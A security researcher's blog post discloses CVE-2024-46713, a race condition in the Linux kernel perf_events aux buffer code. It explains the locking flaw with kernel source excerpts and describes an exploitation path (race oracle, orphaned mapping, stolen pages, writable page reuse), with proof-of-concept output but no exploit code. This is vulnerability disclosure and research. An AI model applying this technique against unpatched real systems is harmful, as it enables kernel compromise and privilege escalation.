Foreword:
We disclosed this vulnerability to the kernel security team through responsible disclosure (CVE-2024-46713). The patch on the mailing list is visible here.
We are publishing the vulnerability to demonstrate that it is fully exploitable and to ensure that the technical details are available.
The vulnerability seems to have been introduced in the 4.1 kernel, when aux
buffers were added to perf
event
s. This makes it roughly 9 years old.
The proof of concept (PoC) in this blog post was only tested on 6.x
kernel versions, but should be transferrable to older kernel versions as well.
We will demonstrate that the vulnerability is exploitable on a pre-patch vanilla kernel.
However, the exploit strategy described in this blog post does not work on any major distributions.
In particular as long as check_pages_enabled
is true, the exploit strategy laid out in this blog post will not work.
This is the case if init_on_alloc
, page poisoning
, init_on_free
, CONFIG_DEBUG_PAGEALLOC
or CONFIG_DEBUG_VM
are enabled.
The vulnerability itself does affect major distributions, but we are not publishing a blueprint for how to perform that exploit.
Debian-based distributions, as well as Android and any virtual machines are not affected.
The rest of this blog post concerns the technical details of the bug and how to exploit it.
What are perf events?
perf_events
is a kernel subsystem intended for performance measurement of various aspects of a system.struct perf_event
objects can be created with the perf_event_open
syscall. Each type of event
is provided by a PMU
(performance measurement unit).
The struct perf_event
is returned to the user mode process as a file descriptor.
Each event
can have an associated struct perf_buffer
ringbuffer, which is called rb
on the event
struct. This ringbuffer can either be created by mmap
ing an event
that doesn’t currently have an rb
, or a different event
s ringbuffer can be assigned to rb
through the PERF_EVENT_IOC_SET_OUTPUT
ioctl
.
perf_buffer struct
The struct perf_buffer
data structure is used to keep track of the memory of a buffer as well as multiple counters.perf_buffer
,
ring buffer
and rb
are used interchangeably throughout the writeup
struct perf_buffer {
refcount_t refcount;
/*[...] Snip for length*/
int nr_pages; /* nr of data pages */
/*[...] Snip for length*/
/* poll crap */
spinlock_t event_lock;
struct list_head event_list;
atomic_t mmap_count;
unsigned long mmap_locked;
struct user_struct *mmap_user;
/* AUX area */
/*[...] Snip for length*/
unsigned long aux_pgoff;
int aux_nr_pages;
int aux_overwrite;
atomic_t aux_mmap_count;
/*[...] Snip for length*/
refcount_t aux_refcount;
int aux_in_sampling;
void **aux_pages;
void *aux_priv;
struct perf_event_mmap_page *user_page;
void *data_pages[];
};
Most of the fields are self explanatory, so we will just give brief additional information on the ones that are relevant for this post.
mmap_count
keeps track of how manyvma
s map an event that has this buffer.aux_nr_pages
is also used to check ifperf_buffer
has anaux
buffer.aux_mmap_count
keeps track of how manyvma
s map an event that has this aux buffer.user_page
points to a special page that the user space can write to, to communicate ring buffer state and configuration.
Creating a ring buffer
To create an rb
on an event
, the event
must be mmap
ed.
The mmap
call is then executing perf_mmap
, which will perform some checks on the arguments and if those pass, it will eventually call rb_alloc
.
Specifically we need that pg_off==0
and that the number of pages we are asking for is one page larger than a power of two.
It should be noted that the vma
is a mapping of the struct perf_event
and not of the struct perf_buffer
The mapped memory starts with the mapping of the user_page
and is followed by the data pages.
If an rb
already exists, a new struct perf_buffer
is not created and the rb->mmap_count
is incremented instead.
This mmap_count
variable keeps track of how many vma
s exist that reference this ring buffer
and once it reaches zero the ring buffer
will drop a reference and will likely be freed.
Aux buffers
For some PMU
s, ring buffers can have an additional aux
auxilliary buffer. The aux buffer
information is embedded in the perf_buffer
struct.
The aux
fields of the rb
are prefixed with aux_
to distinguish them.
To create an aux
buffer, its parameters must first be configured using the user_page
(namely aux_offset
and aux_size
) and can then be mmap
ed with the configured offset and size.
There are additional checks in place to make sure the aux buffer
and the original buffer don’t overlap.
If all checks pass, the aux buffer
values are set up by rb_alloc_aux
.
What can you do with a perf_event
and ringbuffers
A perf_event
fd has the following interactions with ringbuffers.
- mmap
- Create a
perf_buffer
rb
if the event doesn’t have anrb
already andpgoff==0
- Map an existing
perf_buffer
rb
if the event already has an rb and the mmap request matches it. - Create an
aux
buffer for therb
if theuser_page
has set it up andpgoff
matches the configured aux_offset. - Map an existing
aux
buffer, if therb
already has anaux
buffer and the mmap request matches it.
- Create a
- ioctl
- Assign another events
perf_buffer
to self, if ownevent->mmap_count
is 0.
- Assign another events
event->mmap_mutex
The vma
stores a reference to a struct perf_event
, which in turn points to a struct perf_buffer
which is called rb
in the code below.
When the vma
is closed the function perf_mmap_close
is called.
In it the code keeps track of what has been closed and adjusts the appropriate counters.
Below is an excerpt of how aux buffers are handled.
if (rb_has_aux(rb) && vma->vm_pgoff == rb->aux_pgoff &&
atomic_dec_and_mutex_lock(&rb->aux_mmap_count, &event->mmap_mutex)) {
/*[...] Snip for length */
/* this has to be the last one */
rb_free_aux(rb);
WARN_ON_ONCE(refcount_read(&rb->aux_refcount));
mutex_unlock(&event->mmap_mutex);
}
rb_has_aux(rb)
simply checks if rb->aux_nr_pages != 0
.
Then, if vma->vm_pgoff ==
rb->aux_pgoff, the
rb->aux_mmap_countis decremented and the
event->mmap_mutex` lock is taken if it reached 0.
While the lock is taken, some counters are adjusted and eventually rb_free_aux
is called, which will free all of the memory associated with the aux buffer.
The issue
The problem is that the lock that is taken is on event
rather than rb
.
Since multiple events
can point to the same struct perf_buffer
the event->mmap_mutex
does not actually prevent concurrent accesses to the rb
.
In the case of the rb
itself this turns out not to be an issue because you can only forward to a buffer
that already exists. But this is not the case for the aux buffer
.
What can we do with it
To get an idea of how we can use this issue to our advantage, let’s take a closer look at perf_mmap
. I’ll provide multiple code snippets to walk you through the logic.
static int perf_mmap(struct file *file, struct vm_area_struct *vma)
{
struct perf_event *event = file->private_data;
unsigned long user_locked, user_lock_limit;
struct user_struct *user = current_user();
struct perf_buffer *rb = NULL;
/* [...] Snip for length*/
vma_size = vma->vm_end - vma->vm_start;
if (vma->vm_pgoff == 0) {
nr_pages = (vma_size / PAGE_SIZE) - 1;
} else {
/*
* AUX area mapping: if rb->aux_nr_pages != 0, it's already
* mapped, all subsequent mappings should have the same size
* and offset. Must be above the normal perf buffer.
*/
u64 aux_offset, aux_size;
if (!event->rb)
return -EINVAL;
If the requested vm_pgoff
isn’t 0 we assume that it’s a request for an aux
buffer. We can only create an aux buffer if an rb
already exists.
nr_pages = vma_size / PAGE_SIZE;
mutex_lock(&event->mmap_mutex);
ret = -EINVAL;
rb = event->rb;
if (!rb)
goto aux_unlock;
We calculate the number of pages and then take the event->mmap_mutex
lock. Afterwards we check if the event still has an rb
. We then assign to the local rb
variable, this is important for a case distinction later in the code.
aux_offset = READ_ONCE(rb->user_page->aux_offset);
aux_size = READ_ONCE(rb->user_page->aux_size);
if (aux_offset < perf_data_size(rb) + PAGE_SIZE)
goto aux_unlock;
We get the configured parameters from the user page and we check that the configured offset is actually behind the already existing buffer.
/*[...] Snipped a bunch of mundance checks on the pg_off and size*/
if (!atomic_inc_not_zero(&rb->mmap_count))
goto aux_unlock;
if (rb_has_aux(rb)) {
atomic_inc(&rb->aux_mmap_count);
ret = 0;
goto unlock;
}
We increment the rb->mmap_count
and if there already is an aux buffer
we increment rb->aux_mmap_count
and return.
atomic_set(&rb->aux_mmap_count, 1);
user_extra = nr_pages;
goto accounting;
}
If there isn't anaux buffer
already we setrb->aux_mmap_count
to 1 and jump forward.
/*[...]Snip rb stuff before accounting label*/
/*[...]Snip a bunch of rlimit checking to make sure we are allowed to reserve that amount of memory*/
if (!rb) {
/*[...] Snip rb setup code*/
} else {
ret = rb_alloc_aux(rb, event, vma->vm_pgoff, nr_pages,
event->attr.aux_watermark, flags);
if (!ret)
rb->aux_mmap_locked = extra;
}
This is the case distinction mentioned earlier.
Because the local rb
variable is set, we are calling rb_alloc_aux
to create an aux buffer
.
The rest of the function just increments event->mmap_count
and sets up the vma
flags and vm_ops
.
Because all of this is protected by the event->mmap_lock
we can execute it concurrently.
Getting an “orphaned” aux vma
Our first goal is to get a vma
that has the correct size
and pgoff
to be an aux buffer, while aux_nr_pages
is zero.
Note that we can’t do the race in the same process, since the mm->lock
is held during mmap
.
But we can simply fork
into a new process and race from there.
If we mmap
an existing aux buffer
it will just increment rb->aux_mmap_count
and succeed. The way that perf_mmap
checks if there already is an aux buffer
is by checking if aux_nr_pages
is not zero.
If we take a quick look at __rb_free_aux
it goes through all pages and frees them and only sets aux_nr_pages
to zero at the very end.
static void __rb_free_aux(struct perf_buffer *rb)
{
/*[...] Snip for length*/
if (rb->aux_nr_pages) {
for (pg = 0; pg < rb->aux_nr_pages; pg++)
rb_free_aux_page(rb, pg);
kfree(rb->aux_pages);
rb->aux_nr_pages = 0;
}
}
Because it goes through all of the pages first, we can make the time that __rb_free_aux
is in flight almost arbitrarily large.
That means that we can race perf_mmap_close
of the aux buffer
against perf_mmap
.
If perf_mmap_close
reduces rb->aux_mmap_count
to 0 it will call __rb_free_aux
. But perf_mmap
doesn’t check if rb->aux_mmap_count
is zero and will just increment the refcount as long as rb->aux_nr_pages
is not zero.
If we win the race we will have a vma
with an aux buffer
pgoff
, even though rb->aux_nr_pages
has been set to 0.
Race Oracle
With a little bit of trickery we can determine if we were too early or too late or if we just won the race.
To do this we need the following setup:
event1
- supports aux
- already has an
rb
- already has an aux buffer
event2
- does not support aux
- forwarded to
event1
srb
We will race the mmap of event2
against the munmap
of the aux buffer
of event1
.
If we are too early, then event2
increments rb->aux_mmap_count
before perf_mmap_close
decrements it, so the aux buffer
is never freed. So our mmap
succeeds. If we are too late, then rb->aux_nr_pages
was already 0 and event2
will try to create an aux buffer
and mmap
will fail with -EOPNOTSUPP
. If we win the race, then our mmap
succeeds just like in the too early case, but if we try to access any of the memory in the vma
we will get a SIGBUS
since the aux buffer
isn’t backed by memory.
So our oracle works like this:
If mmap fails, we were too late.
If mmap succeeds, we wait a little bit, to make sure that __rb_free_aux
has finished running.
If we then try to access the mapped vma
s memory and it succeeds we were too early.
But if it fails with SIGBUS
we won the race.
Because we have an oracle we can very reliably find the correct timing for the race condition.
What do we gain from the “orphaned” vma?
Let’s first take a quick look at perf_mmap_fault
. This is the fault handler that is responsible for handling page faults in the perf_event
vma
s.
static vm_fault_t perf_mmap_fault(struct vm_fault *vmf)
{
struct perf_event *event = vmf->vma->vm_file->private_data;
struct perf_buffer *rb;
vm_fault_t ret = VM_FAULT_SIGBUS;
/*[...] Snip some code related to write protecting vma pages*/
vmf->page = perf_mmap_to_page(rb, vmf->pgoff);
if (!vmf->page)
goto unlock;
get_page(vmf->page);
vmf->page->mapping = vmf->vma->vm_file->f_mapping;
vmf->page->index = vmf->pgoff;
ret = 0;
/*[...]Snip rcu_unlock*/
return ret;
}
The page fault handler basically looks up the associated page of the buffer and then inserts it into the vma. You may have noticed that it doesn’t take any locks associated with the rb
.
Here is the perf_mmap_to_page
function.
struct page *
perf_mmap_to_page(struct perf_buffer *rb, unsigned long pgoff)
{
if (rb->aux_nr_pages) {
/* above AUX space */
if (pgoff > rb->aux_pgoff + rb->aux_nr_pages)
return NULL;
/* AUX space */
if (pgoff >= rb->aux_pgoff) {
int aux_pgoff = array_index_nospec(pgoff - rb->aux_pgoff, rb->aux_nr_pages);
return virt_to_page(rb->aux_pages[aux_pgoff]);
}
}
return __perf_mmap_to_page(rb, pgoff);
}
You can see that as long as rb->aux_nr_pages
isn’t zero, we can still access the aux buffer
pages.
In particular we can still fault pages into our vma
while (or even after) __rb_free_aux
is returning them to the page allocator,
This wouldn’t normally be a problem, since we can’t fault in aux buffer
pages if we don’t have a vma
that corresponds to the aux buffer
. And the aux buffer
should only be freed if rb->aux_mmap_count
becomes zero.
But because of our orphaned aux buffer
vma
we now have a vma
that has the correct pgoff
to access the aux buffer
but isn’t accounted for by rb->aux_mmap_count
.
(Well, it technically is accounted for at this stage. But as soon as we create a new aux buffer
– which we can do because aux_nr_pages
is zero – it will set aux_mmap_count
back to 1
, making the orphaned vma unaccounted for.)
Stealing pages
By racing against the freeing of the pages we are able to get several pages mapped in our process that have already been returned to the page allocator
. This means we already have a page reuse
primitive at this stage. The problem is that we aren’t allowed to write to any of the pages in an aux buffer
.
But since we are allowed to write to the user page
, we can spray struct event_buffer
with just one page – the user page
.
We already know that it is available, since we used it earlier and it has the same allocation flags
as the aux buffer
page allocation, so it is likely that we will receive (at least some of) the same pages that were just returned to the page allocator
.
The pages that get returned will be initialized and will have their refcount
reset to 1.
The spray is very nice, because we can simply fill each freshly allocated user page
with data and then scan all of the “stolen” pages to work out if we found a match and which stolen page it corresponds to.
And we can repeat this process as often as needed.
Once we have found enough pages, we then remove them from the readonly orphaned aux buffer
mapping and can unmap the user page
in our spray with madvise
MADV_DONTNEED
.
Using madvise
let’s us remove the page from the vma
mapping without closing the vma
.
This will drop the refcount
of the page back to zero because it was reset to 1 when it was allocated for our user page
.
Because the refcount
dropped to zero, the page is returned to the page allocator
once again – even though we still have a reference to it – but this time it is writable.
At this stage we have a writable page reuse primitive.
We can now spray kernel objects and if they end up in our page we have full control over them.
The rest of the exploit is neither interesting nor specific to this vulnerability, so we will stop here.
Why it doesn’t work on most distros
On most (or even all) distributions this strategy doesn’t work. If check_pages_enabled
is true the page allocator
will perform several sanity checks for every page it returns. And the pages that we “stole” have a non-zero refcount
.
This is what that looks like:
Aug 05 11:59:33 archlinux kernel: BUG: Bad page map in process exploit pte:8000000378b4f025 pmd:3bb7ff067
Aug 05 11:59:33 archlinux kernel: page: refcount:1 mapcount:-1 mapping:00000000dbe5efca index:0x751 pfn:0x378b4f
Aug 05 11:59:33 archlinux kernel: aops:anon_aops.0 ino:836 dentry name:"inotify"
Aug 05 11:59:33 archlinux kernel: flags: 0x2ffff8000000004(referenced|node=0|zone=2|lastcpupid=0x1ffff)
Aug 05 11:59:33 archlinux kernel: raw: 02ffff8000000004 dead000000000100 dead000000000122 ffff975cc0585d50
Aug 05 11:59:33 archlinux kernel: raw: 0000000000000751 0000000000000000 00000001fffffffe 0000000000000000
Aug 05 11:59:33 archlinux kernel: page dumped because: bad pte
In that case the page allocator
will skip over any pages that don’t pass the sanity checks, so the stolen pages will never be returned by the page allocator
for any allocation.
It is possible to get around this in a scenario where another process allocates the page in the time window between the page being returned by __rb_free_aux
and us stealing the page. But in that case the refcount
never becomes zero, so we can not perform the pivot to a writable mapping. Making it most likely only a KASLR bypass.
Demo
But on a fresh vanilla kernel compiled with a default config these checks are not enabled.
Below you can see the output of our proof of concept.
/ # /mnt/host/exploit
[+] Opening event fd
[+] Found aux mappable pmu: t=1, c=2
[+] Opened event fds
[+] redirected event2->event1
[P] Started
[C] Started
[C] Won stage 1 race
[C] Unmap Fault Started
[P] Unmap Started
[C] Won stage 2 race
[C] Caught sigbus, correcting offset
[P] Starting the spray
[C] Scanning 2339 pages, range 0x7fcb1d263000-0x7fcb1db86000
[C] Unmapping readable pages with writable counterpart
[P] Found 33 writable page(s) in 49 iterations
[C] Spinning
[P] Doing refcount manipulation
[P] Checking for change and spraying
[P] Writable page changed
dump@0x7fcb1db46000
dump: +0000: 0000000000000000000000000000000010FFFF42FFFFFFFF10FFFF42FFFFFFFF000000000000000028FFFF42FFFFFFFF28FFFF42FFFFFFFF0000000000000000
dump: +0040: 40FFFF42FFFFFFFF40FFFF42FFFFFFFF000000000000000010000000100000001000000001000000010000000200000001000000010000000000000000000000
dump: +0080: 00000000000000000000000000000000000000000000000000FFFF40FFFFFFFF601305FFFFFFFFFF000000000000000000000000000000000000000000000000
dump: +00c0: 00000000000000000000000000000000FFFFFF42FFFFFFFFFFFFFF42FFFFFFFF0000000000000000FFFFFF42FFFFFFFFFFFFFF42FFFFFFFF0000000000000000
dump: +0100: 00FFFF42FFFFFFFF00FFFF42FFFFFFFF000000000000000010000000100000001000000001000000010000000200000001000000010000000000000000000000
dump: +0140: 00000000000000000000000000000000000000000000000000FFFF40FFFFFFFF601305FFFFFFFFFF000000000000000000000000000000000000000000000000
dump: +0180: 00000000000000000000000000000000FFFFFF42FFFFFFFFFFFFFF42FFFFFFFF0000000000000000FFFFFF42FFFFFFFFFFFFFF42FFFFFFFF0000000000000000
dump: +01c0: FFFFFF42FFFFFFFFFFFFFF42FFFFFFFF000000000000000010000000100000001000000001000000010000000200000001000000010000000000000000000000
dump: +0200: 00000000000000000000000000000000000000000000000000FFFF40FFFFFFFF601305FFFFFFFFFF000000000000000000000000000000000000000000000000
dump: +0240: 0000000000000000000000000000000050FFFF42FFFFFFFF50FFFF42FFFFFFFF000000000000000068FFFF42FFFFFFFF68FFFF42FFFFFFFF0000000000000000
dump: +0280: FFFFFF42FFFFFFFFFFFFFF42FFFFFFFF000000000000000010000000100000001000000001000000010000000200000001000000010000000000000000000000
dump: +02c0: 00000000000000000000000000000000000000000000000000FFFF40FFFFFFFF601305FFFFFFFFFF000000000000000000000000000000000000000000000000
dump: +0300: 0000000000000000000000000000000010FFFF42FFFFFFFF10FFFF42FFFFFFFF000000000000000028FFFF42FFFFFFFF28FFFF42FFFFFFFF0000000000000000
dump: +0340: 40FFFF42FFFFFFFF40FFFF42FFFFFFFF000000000000000010000000100000001000000001000000010000000200000001000000010000000000000000000000
dump: +0380: 00000000000000000000000000000000000000000000000000FFFF40FFFFFFFF601305FFFFFFFFFF000000000000000000000000000000000000000000000000
dump: +03c0: 00000000000000000000000000000000FFFFFF42FFFFFFFFFFFFFF42FFFFFFFF0000000000000000FFFFFF42FFFFFFFFFFFFFF42FFFFFFFF0000000000000000
[P] Main thread done
[P] Spinning
Try it yourself
The PoC described in this blog post can be found here.
If you plan to experiment with this bug it is HIGHLY recommended to patch the kernel so that you can do so in a virtual machine
. You will most likely completely freeze the kernel if anything goes wrong with your exploit.
Your virtual machine should have at least 2 CPU cores, so that the race can happen concurrently.
Written by Nils Ole Timm, @Firzen14
Linux Team Security Researcher
Binary Gecko GmbH